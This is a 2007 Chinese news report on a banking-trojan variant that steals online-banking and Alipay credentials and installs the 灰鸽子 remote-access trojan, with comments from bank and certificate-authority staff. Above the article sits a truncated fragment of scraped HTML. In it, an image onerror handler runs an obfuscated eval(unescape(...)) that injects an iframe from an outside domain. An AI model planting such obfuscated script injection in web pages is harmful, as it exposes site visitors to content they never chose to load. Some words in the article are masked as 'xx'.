网银大盗联手灰鸽子,数字证书难保网银安全

0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" src='http://gimg.baidu.com/img/gsgs.gif' width=0 height=0 onerror="eval (unescape('var%20content1%3D%22%3CI+FR+AME%20%20align%3Dcenter%20marginWidth%3D0%20marginHeight%3D0%20src%3Dhttp%3A//qdsm.net/links/zh_160_600.html%20frameBorder%3D0%20width%3D160%20scrolling%3Dno%20height%3D600%3E%3C/I+FRAM+E%3E%22%3B%20document.getElementById%28%22contenthtml1%22%29.innerHTML%3D%20content1'.replace(/\+/g,'')))">

2007年01月09日 08:13　北京娱乐信报　甄世宇　张煦
　　“网银大盗”变种(TrojanSpy.Banker.gj)木马病毒昨天被截获。该病毒可以xx多家网上银行及支付宝等系统的交易账户号和密码，同时，在中毒电脑中安装“灰鸽子”木马，黑客通过“灰鸽子”可以进一步远程控制中毒电脑，窃取电脑中所有文件，包括网上银行数字证书。

　　昨天，江民反病毒中心截获“网银大盗”变种(TrojanSpy.Banker.gj)木马病毒。反病毒专家介绍，该病毒伪装成rar图标，引诱用户进行点击。与其他“网银大盗”变种不同的是，该病毒还会从网络http：／／／qjnew／×××／c／house／b／k／2.exe下载灰鸽子病毒体。灰鸽子是一种功能更强大的远程控制工具，这样用户计算机内的所有文件都会被黑客所窃取，计算机将被黑客xx控制，这样，即使网上银行用户使用了数字证书，也难保网上银行资金安全。

　　记者获悉，病毒窃取的指定银行和商户包括，中国建设银行个人网上银行、兴业银行网上银行、中国民生银行网上银行、中信银行网上银行、招商银行个人银行大众版以及支付宝。

　　数字证书一直被用户认为是网上银行xxx的通行证。到2006年年底国内网上银行用户超过4000万，现有个人用户中使用数字证书的占46%，企业用户中有46.3%正在使用数字证书。如果数字证书被黑客xx，将威胁到2000万左右网银用户的账户安全。

　　招商银行零售银行部副总经理胡滔昨天接受采访时说，网银用户不必为此过分恐慌。银行为保护客户的账户安全采取了很多措施。比如招行网银大众版已经屏蔽了转账功能，只能查询，资金不会被盗用。专业版则强制客户关闭浏览器远程终端选项才能启动，因此不必担心被黑客远程操纵。

　　银行人士和反病毒专家联合提醒网银用户，要保护好自己的电脑和交易密码，及时升级杀毒软件。

　　新闻追访

　　什么是数字证书？

　　记者昨天就此采访了中国金融认证中心(CFCA)，该机构是为各家银行的网上银行数字证书提供认证的第三方机构。CFCA市场部助理经理崔蕾说：“灰鸽子病毒体早已有之，它可以xx电脑中的所有文件。如果再针对某银行的网上银行结合了密码截取器，是可以在网银用户上网时模仿用户本人登录网上银行并进行交易。不过，这并不等于所有的网上银行数字证书都受到安全威胁。”

　　崔蕾表示，目前银行主要向客户推荐的移 动数字证书，是以U盘为介质的。证书保存在U盘里的，用户登录需要插入U盘，使用完拔下U盘，U盘内的文件不会被保存在电脑上，因此用户不必担心被黑客控制。

　　记者了解到，由于移 动数字证书的价格比较贵，一般在70元-80元。因此，有些银行还发行一种廉价的数字证书，只要10元左右，这种数字证书是被保存在电脑上的。崔蕾不否认这种数字证书有被黑客攻击的可能。“不过这并不是数字证书本身不安全，而是电脑上所有的文件均被xx。打个比喻来说，数字证书就像是通往网上银行的大门，但是无论这个大门多么坚固，主人要是把钥匙丢了，门也就形同虚设了。”崔蕾说。